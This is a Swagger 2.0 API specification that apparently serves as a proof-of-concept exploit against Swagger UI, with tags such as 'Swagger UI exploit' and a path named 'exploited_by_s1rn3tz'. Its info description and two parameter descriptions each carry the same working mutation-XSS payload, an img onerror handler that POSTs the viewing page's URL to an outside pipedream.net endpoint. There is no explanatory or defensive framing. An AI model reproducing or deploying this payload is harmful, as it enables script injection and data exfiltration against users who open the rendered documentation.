swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror="var xhr=new XMLHttpRequest();xhr.open('POST', 'https://en06v3iu5qly1f.x.pipedream.net/', true);xhr.setRequestHeader('Content-Type', 'application/json');xhr.send(JSON.stringify({ message: 'Server file and folder info', url: window.location.href }));" src=1></form>
  version: production
basePath: https://testapi.tbcpay.ge
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  "/s1rn3tz":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - Mathis Pais De Sousa
      operationId: findAccounts
      summary: this is example text
  "/exploited_by_s1rn3tz":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror="var xhr=new XMLHttpRequest();xhr.open('POST', 'https://en06v3iu5qly1f.x.pipedream.net/', true);xhr.setRequestHeader('Content-Type', 'application/json');xhr.send(JSON.stringify({ message: 'Server file and folder info', url: window.location.href }));" src=1></form>
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: afine
      summary: afine
    get:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror="var xhr=new XMLHttpRequest();xhr.open('POST', 'https://en06v3iu5qly1f.x.pipedream.net/', true);xhr.setRequestHeader('Content-Type', 'application/json');xhr.send(JSON.stringify({ message: 'Server file and folder info', url: window.location.href }));" src=1></form>
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
